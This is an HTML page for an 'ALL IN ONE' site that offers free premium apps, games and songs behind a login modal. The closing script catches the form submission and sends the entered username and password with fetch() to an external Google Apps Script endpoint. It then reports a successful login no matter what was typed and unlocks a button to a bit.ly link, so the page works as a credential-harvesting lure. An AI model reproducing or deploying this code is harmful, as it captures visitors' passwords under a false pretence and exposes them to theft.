<!DOCTYPE html>
<html>
<head>
<link rel="icon" href="tab icon.png" type="image/png" sizes="16x16">
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {
  font-family: Arial, Helvetica, sans-serif;
  background-color: rgb(0,0,0);
  background-position: center;
}
p{
   text-align: center;
   color:white;
   font-family: Arial, Helvetica, sans-serif;
 }
h1{
   text-align: center;
   color:white;
   font-family: Arial, Helvetica, sans-serif;
 }
* {
  box-sizing: border-box;
  }
  .mySlides {display: none;}
  img {vertical-align: middle;}
  .slideshow-container {
  max-width: 1000px;
  position: relative;
  margin: auto;
}

.active {
  background-color: #717171;
}
.fade {
  -webkit-animation-name: fade;
  -webkit-animation-duration: 1.5s;
  animation-name: fade;
  animation-duration: 1.5s;
}

@-webkit-keyframes fade {
  from {opacity: .4} 
  to {opacity: 1}
}

@keyframes fade {
  from {opacity: .4} 
  to {opacity: 1}
}

/* On smaller screens, decrease text size */
@media only screen and (max-width: 300px) {
  .text {font-size: 11px}
}
/* Full-width input fields */
input[type=text], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
}

/* Set a style for all buttons */
button {
  background-color: #3844b3;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
}

button:hover {
  opacity: 0.8;
}

/* Extra styles for the cancel button */
.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

/* Center the image and position the close button */


.container {
  padding: 16px;
}

span.psw {
  float: right;
  padding-top: 16px;
}

/* The Modal (background) */
.modal {
  display: none; /* Hidden by default */
  position: fixed; /* Stay in place */
  z-index: 1; /* Sit on top */
  left: 0;
  top: 0;
  width: 100%; /* Full width */
  height: 100%; /* Full height */
  overflow: auto; /* Enable scroll if needed */
  background-color:white; /* Fallback color */
  padding-top: 60px;
}

/* Modal Content/Box */
.modal-content {
  background-color: #fefefe;
  margin: 5% auto 15% auto; /* 5% from the top, 15% from the bottom and centered */
  border: 1px solid #888;
  width: 80%; /* Could be more or less, depending on screen size */
}

/* The Close Button (x) */
.close {
  position: absolute;
  right: 25px;
  top: 0;
  color: #000;
  font-size: 35px;
  font-weight: bold;
}

.close:hover,
.close:focus {
  color: red;
  cursor: pointer;
}

/* Add Zoom Animation */
.animate {
  -webkit-animation: animatezoom 0.6s;
  animation: animatezoom 0.6s
}

@-webkit-keyframes animatezoom {
  from {-webkit-transform: scale(0)} 
  to {-webkit-transform: scale(1)}
}
  
@keyframes animatezoom {
  from {transform: scale(0)} 
  to {transform: scale(1)}
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
</style>
</head>
<body>
  <h1>Welcome to ALL IN ONE</h1>
  <p>login and use our All in one fretures,this is starting for all that why it is free for 1 year and you have no account singup now you get our prenium app today 2 or 3 app after days, months or years you get more the 3 apps.</p>
  <div class="slideshow-container">

    <div class="mySlides fade">
      <img src="https://dcassetcdn.com/design_img/2453268/624788/624788_12883816_2453268_b66b9dd7_image.jpg" style="width:100%">
      <p>Welcome to ALL IN ONE</p>
    </div>
    
    <div class="mySlides fade">
      <img src="download.jfif" style="width:100%">
      <p>Get our all games in ALL IN ONE.</p>
    </div>
    
    <div class="mySlides fade">
      <img src="https://png.pngtree.com/png-clipart/20190630/original/pngtree-vector-music-note-icon-png-image_4162762.jpg" style="width:100%">
      <p>Get our all songes.</p>
    </div>
    
    </div>
    <br>
    
    <div style="text-align:center">
      <span class="dot"></span> 
      <span class="dot"></span> 
      <span class="dot"></span> 
    </div>
<p><button onclick="document.getElementById('id01').style.display='block'" style="width:auto;">Login</button></p>

<div id="id01" class="modal">
  
  <form class="modal-content animate" name="google-sheet" method="post">
  <div class="container" style="background-color:#f1f1f1">
     <form method="post" autocomplete="off" name="google-sheet">
     <div class="form-group">
     <input type="text" name="user name" class="form-control" placeholder="User name" value="" required=""/>
     </div>
     
     <div class="form-group">
     <input type="password" name="password" class="form-control" placeholder="Password"  value="" required=""/>
     </div>
     <div class="form-group">
     <button onclick="myFunction()" <input type="submit" name="submit" class="btnSubmit btn-block" value="Login" />login</button>
     
     </div>
     </form>
    </div>
    <div class="container" style="background-color:#f1f1f1">
      <button type="button" onclick="document.getElementById('id01').style.display='none'" class="cancelbtn">Cancel</button><span class="psw"><a href="https://docs.google.com/forms/d/e/1FAIpQLScR3mD2ObUy0fdQovdqAh6lHNehE-tKJLMEMeKqBee4bS1rkg/viewform?usp=sf_link" >Forget Password</a></span>
      <button id="auto" onclick="document.location='https://bit.ly/AllinonebyJunaid'" disabled >Go to Dashboard</button>
      
    </div>
  </form>
</div>

<script>
// Get the modal
var modal = document.getElementById('id01');

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "none";
    }
}
</script>
<script>
  var slideIndex = 0;
  showSlides();
  
  function showSlides() {
    var i;
    var slides = document.getElementsByClassName("mySlides");
    var dots = document.getElementsByClassName("dot");
    for (i = 0; i < slides.length; i++) {
      slides[i].style.display = "none";  
    }
    slideIndex++;
    if (slideIndex > slides.length) {slideIndex = 1}    
    for (i = 0; i < dots.length; i++) {
      dots[i].className = dots[i].className.replace(" active", "");
    }
    slides[slideIndex-1].style.display = "block";  
    dots[slideIndex-1].className += " active";
    setTimeout(showSlides, 2000); // Change image every 2 seconds
  }
  </script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
			<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
			<script>
			function myFunction() {
			 document.getElementById("auto").disabled = false;
			}
</script>
<script>
		const scriptURL = 'https://script.google.com/macros/s/AKfycbzWWM6iihGubruAEBDOZbFfd8gwNHb8R3yo87ml5gp5bpEM464/exec'
		const form = document.forms['google-sheet']
		
		form.addEventListener('submit', e => {
		e.preventDefault()
		fetch(scriptURL, { method: 'POST', body: new FormData(form)})
		.then(response => alert("You login successfully"))
.catch(error => console.error('Error!', error.message))
			})
			</script>
</body>
</html>
